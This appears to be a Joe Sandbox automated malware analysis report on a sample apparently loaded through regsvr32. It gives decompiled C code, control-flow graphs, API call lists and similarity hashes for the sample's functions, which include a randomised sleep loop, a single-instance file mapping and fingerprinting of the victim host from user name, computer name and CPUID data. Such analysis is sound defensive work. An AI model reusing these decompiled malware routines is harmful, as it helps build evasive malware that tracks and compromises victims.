                                                                                                                                                                                                                                    0x023e6923
                                                                                                                                                                                                                                    0x00000000

APIs
• memset.NTDLL ref: 023E679B
• CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 023E67A7
• _allmul.NTDLL(00000000,FF676980,000000FF), ref: 023E67CC
• SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 023E67E8
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 023E6801
• HeapFree.KERNEL32(00000000,00000000), ref: 023E6897
• CloseHandle.KERNEL32(?), ref: 023E68A6
• _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 023E68E0
• SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,023E2417,?), ref: 023E68F6
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 023E6901
  • Part of subcall function 023E73FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04CC9388,00000000,?,76D7F710,00000000,76D7F730), ref: 023E744C
  • Part of subcall function 023E73FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04CC93C0,?,00000000,30314549,00000014,004F0053,04CC937C), ref: 023E74E9
  • Part of subcall function 023E73FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,023E6814), ref: 023E74FB
• GetLastError.KERNEL32 ref: 023E6913

Memory Dump Source
• Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
• Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
• Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd

Similarity
• API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
• String ID:
• API String ID: 3521023985-0
• Opcode ID: 41fe28f76a0db25d58ee616967adb44af186baae1a640d0c37878d1ac117f3d9
• Instruction ID: eb681d3fe90812d8b869abe9ad61e61a29dd2525b235586fc57e40e2dddd184e
• Opcode Fuzzy Hash: 41fe28f76a0db25d58ee616967adb44af186baae1a640d0c37878d1ac117f3d9
• Instruction Fuzzy Hash: 56512BB1C01229EADF20DF94DC45AEEBFBDEF59324F104516E826A61D0D7709A58CFA0

Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 130 26d163f-26d1652 call 26d1850 133 26d1658 130->133 134 26d1740-26d1742 130->134 135 26d1659-26d1690 GetSystemTime SwitchToThread call 26d18f4 Sleep 133->135 138 26d1692-26d1694 135->138 139 26d173f 138->139 140 26d169a-26d169e 138->140 139->134 141 26d16ef-26d170a call 26d12dc 140->141 142 26d16a0-26d16ab call 26d1538 140->142 149 26d170c-26d171a WaitForSingleObject 141->149 150 26d1730-26d1732 GetLastError 141->150 147 26d16ad-26d16bf GetLongPathNameW 142->147 148 26d16e9 142->148 152 26d16e1-26d16e7 147->152 153 26d16c1-26d16d2 call 26d1de1 147->153 148->141 154 26d171c-26d1721 GetExitCodeThread 149->154 155 26d1727-26d172e CloseHandle 149->155 151 26d1735-26d173b 150->151 151->139 156 26d173d GetLastError 151->156 152->141 153->152 159 26d16d4-26d16da GetLongPathNameW call 26d1dfc 153->159 154->155 155->151 156->139 161 26d16df 159->161 161->141
                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                    			E026D163F(char _a4) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v24;
                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				long _t20;
                                                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                    				long _t30;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t20 = E026D1850();
                                                                                                                                                                                                                                    				_v8 = _t20;
                                                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                                                    					return _t20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					GetSystemTime( &_v24);
                                                                                                                                                                                                                                    					_t22 = SwitchToThread();
                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                    					_t44 = 9;
                                                                                                                                                                                                                                    					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                                                                                                                                                                                                                                    					_t25 = E026D18F4(0, _t51); // executed
                                                                                                                                                                                                                                    					_v8 = _t25;
                                                                                                                                                                                                                                    					Sleep(_t51 << 5); // executed
                                                                                                                                                                                                                                    					_t26 = _v8;
                                                                                                                                                                                                                                    				} while (_t26 == 0xc);
                                                                                                                                                                                                                                    				if(_t26 != 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t26;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_t54 = E026D12DC(E026D135A,  &_v48);
                                                                                                                                                                                                                                    					if(_t54 == 0) {
                                                                                                                                                                                                                                    						_v8 = GetLastError();
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                                                                                                                                                                                                                                    						_v8 = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							GetExitCodeThread(_t54,  &_v8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						CloseHandle(_t54);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t26 = _v8;
                                                                                                                                                                                                                                    					if(_t26 == 0xffffffff) {
                                                                                                                                                                                                                                    						_t26 = GetLastError();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E026D1538(_t44,  &_a4) != 0) {
                                                                                                                                                                                                                                    					 *0x26d4138 = 0;
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 = _a4;
                                                                                                                                                                                                                                    				_t55 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                    				_t36 =  *_t55(_t43, 0, 0); // executed
                                                                                                                                                                                                                                    				_t48 = _t36;
                                                                                                                                                                                                                                    				if(_t48 == 0) {
                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                    					 *0x26d4138 = _t43;
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t14 = _t48 + 2; // 0x2
                                                                                                                                                                                                                                    				_t38 = E026D1DE1(_t48 + _t14);
                                                                                                                                                                                                                                    				 *0x26d4138 = _t38;
                                                                                                                                                                                                                                    				if(_t38 == 0) {
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *_t55(_t43, _t38, _t48); // executed
                                                                                                                                                                                                                                    				E026D1DFC(_t43);
                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d16e1
                                                                                                                                                                                                                                    0x026d16c1
                                                                                                                                                                                                                                    0x026d16c6
                                                                                                                                                                                                                                    0x026d16cd
                                                                                                                                                                                                                                    0x026d16d2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d16d7
                                                                                                                                                                                                                                    0x026d16da
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,026D164B,76D263F0), ref: 026D185F
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: GetVersion.KERNEL32 ref: 026D186E
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: GetCurrentProcessId.KERNEL32 ref: 026D1885
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 026D189E
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,00000000,76D263F0), ref: 026D165D
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 026D1663
                                                                                                                                                                                                                                      • Part of subcall function 026D18F4: VirtualAlloc.KERNELBASE(00000000,026D167D,00003000,00000004,?,?,026D167D,00000000), ref: 026D194A
                                                                                                                                                                                                                                      • Part of subcall function 026D18F4: memcpy.NTDLL(?,?,026D167D,?,?,026D167D,00000000), ref: 026D19DC
                                                                                                                                                                                                                                      • Part of subcall function 026D18F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,026D167D,00000000), ref: 026D19F7
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 026D1684
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 026D16B9
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 026D16D7
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 026D170F
                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 026D1721
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 026D1728
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 026D1730
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D173D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                    • Opcode ID: db239be5939180da55019a94bc91fc027bd16ed16b50a9c9acd266a6b49186c1
                                                                                                                                                                                                                                    • Instruction ID: 4bc4eb3e77517ac660d8ee71f17ac71a520ff85c09dcfe1962148c786fe2af19
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db239be5939180da55019a94bc91fc027bd16ed16b50a9c9acd266a6b49186c1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB31D475D0124CABCB10EBF5DC84AAE77BDEF46250B2445AAE918D3340EBB0CA51CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 162 26d102f-26d1086 GetSystemTimeAsFileTime _aulldiv _snwprintf 163 26d108d-26d10a6 CreateFileMappingW 162->163 164 26d1088 162->164 165 26d10a8-26d10b1 163->165 166 26d10f0-26d10f6 GetLastError 163->166 164->163 167 26d10c1-26d10cf MapViewOfFile 165->167 168 26d10b3-26d10ba GetLastError 165->168 169 26d10f8-26d10fe 166->169 171 26d10df-26d10e5 GetLastError 167->171 172 26d10d1-26d10dd 167->172 168->167 170 26d10bc-26d10bf 168->170 173 26d10e7-26d10ee CloseHandle 170->173 171->169 171->173 172->169 173->169
                                                                                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                                                                                    			E026D102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                                                                    				L026D2100();
                                                                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                                                    				_t15 =  *0x26d4150;
                                                                                                                                                                                                                                    				_push(_t15 + 0x26d505e);
                                                                                                                                                                                                                                    				_push(_t15 + 0x26d5054);
                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                    				L026D20FA();
                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t19 = CreateFileMappingW(0xffffffff, 0x26d4140, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                    				_t34 = _t19;
                                                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 026D103C
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 026D1052
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 026D1077
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,026D4140,00000004,00000000,?,?), ref: 026D109C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D10B3
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 026D10C7
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D10DF
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 026D10E8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D10F0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                                                                    • Opcode ID: 23b2667fd7d585ac3d170156684780b28780a1f221e7550d1bd8462bc4890a8c
                                                                                                                                                                                                                                    • Instruction ID: f1243f7bc7c95489a95ad3467ea922539c79e8462c40d084f26d3ad1bac589d6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23b2667fd7d585ac3d170156684780b28780a1f221e7550d1bd8462bc4890a8c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91210672E4018CBFC710AFA8DC84EEE77A9EB48344F9040A5F619E7280DB7099958B71
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E023E1B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				struct _FILETIME* _v12;
                                                                                                                                                                                                                                    				short _v56;
                                                                                                                                                                                                                                    				struct _FILETIME* _t12;
                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t27 = __edx;
                                                                                                                                                                                                                                    				_t12 =  &_v12;
                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                    				L023EB0C2();
                                                                                                                                                                                                                                    				_push(_t12);
                                                                                                                                                                                                                                    				_v12 = _t12;
                                                                                                                                                                                                                                    				_t13 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t5 = _t13 + 0x23ee862; // 0x4cc8e0a
                                                                                                                                                                                                                                    				_t6 = _t13 + 0x23ee59c; // 0x530025
                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                    				_push( &_v56);
                                                                                                                                                                                                                                    				_v8 = _t27;
                                                                                                                                                                                                                                    				L023EAD5A();
                                                                                                                                                                                                                                    				_t17 = CreateFileMappingW(0xffffffff, 0x23ed2a8, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                    				_t30 = _t17;
                                                                                                                                                                                                                                    				if(_t30 == 0) {
                                                                                                                                                                                                                                    					_t28 = GetLastError();
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                    							_t28 = GetLastError();
                                                                                                                                                                                                                                    							if(_t28 != 0) {
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a4 = _t30;
                                                                                                                                                                                                                                    							 *_a8 = _t21;
                                                                                                                                                                                                                                    							_t28 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t28 = 2;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						CloseHandle(_t30);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t28;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,023E22EA,?,?,4D283A53,?,?), ref: 023E1B3B
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 023E1B51
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 023E1B76
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,023ED2A8,00000004,00000000,00001000,?), ref: 023E1B92
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,023E22EA,?,?,4D283A53), ref: 023E1BA4
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 023E1BBB
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,023E22EA,?,?), ref: 023E1BDC
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,023E22EA,?,?,4D283A53), ref: 023E1BE4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1814172918-0
                                                                                                                                                                                                                                    • Opcode ID: 0883974953bcd3ccfa0bac734d91d9b52e65b811efd1824a82607a933abf2395
                                                                                                                                                                                                                                    • Instruction ID: 74d485c8a5a1d2ec4118045f2dc772722b9c3c7789d1544bf0be031e66a069cb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0883974953bcd3ccfa0bac734d91d9b52e65b811efd1824a82607a933abf2395
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6921A4B6A40218FBDF359BA8CC05F8E77ADAB44750F114552F51AEA2C1E770EE08CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 183 23e269c-23e26b0 184 23e26ba-23e26cc call 23e6b43 183->184 185 23e26b2-23e26b7 183->185 188 23e26ce-23e26de GetUserNameW 184->188 189 23e2720-23e272d 184->189 185->184 190 23e272f-23e2746 GetComputerNameW 188->190 191 23e26e0-23e26f0 RtlAllocateHeap 188->191 189->190 192 23e2748-23e2759 RtlAllocateHeap 190->192 193 23e2784-23e27a6 190->193 191->190 194 23e26f2-23e26ff GetUserNameW 191->194 192->193 195 23e275b-23e2764 GetComputerNameW 192->195 196 23e270f-23e271e HeapFree 194->196 197 23e2701-23e270d call 23e2496 194->197 198 23e2766-23e2772 call 23e2496 195->198 199 23e2775-23e277e HeapFree 195->199 196->190 197->196 198->199 199->193
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E023E269C(char __eax, signed int* __esi) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                                                    				long _t50;
                                                                                                                                                                                                                                    				char _t59;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				signed int* _t64;
                                                                                                                                                                                                                                    				char _t65;
                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    				signed int* _t69;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                                                                                                    				_t65 = __eax;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_v12 = __eax;
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					_t59 =  *0x23ed270; // 0xd448b889
                                                                                                                                                                                                                                    					_v12 = _t59;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t64 = _t69;
                                                                                                                                                                                                                                    				E023E6B43( &_v12, _t64);
                                                                                                                                                                                                                                    				if(_t65 != 0) {
                                                                                                                                                                                                                                    					 *_t69 =  *_t69 ^  *0x23ed278 ^ 0x4c0ca0ae;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                    					_t50 = _v8;
                                                                                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                                                                                    						_t62 = RtlAllocateHeap( *0x23ed238, 0, _t50 + _t50);
                                                                                                                                                                                                                                    						if(_t62 != 0) {
                                                                                                                                                                                                                                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                    								_t63 = _t62;
                                                                                                                                                                                                                                    								 *_t69 =  *_t69 ^ E023E2496(_v8 + _v8, _t63);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							HeapFree( *0x23ed238, 0, _t62);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t61 = __imp__;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                    				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                    				_t34 = _v8;
                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                    					_t68 = RtlAllocateHeap( *0x23ed238, 0, _t34 + _t34);
                                                                                                                                                                                                                                    					if(_t68 != 0) {
                                                                                                                                                                                                                                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                    							_t63 = _t68;
                                                                                                                                                                                                                                    							_t69[3] = _t69[3] ^ E023E2496(_v8 + _v8, _t63);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapFree( *0x23ed238, 0, _t68);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                                                    				_t67 =  &_v28;
                                                                                                                                                                                                                                    				 *_t67 = 1;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                    				 *(_t67 + 8) = _t63;
                                                                                                                                                                                                                                    				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                    				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                    				_t69[1] = _t69[1] ^ _t39;
                                                                                                                                                                                                                                    				return _t39;
                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 023E26D3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 023E26EA
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 023E26F7
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,023E23D9), ref: 023E2718
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 023E273F
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 023E2753
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 023E2760
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,023E23D9), ref: 023E277E
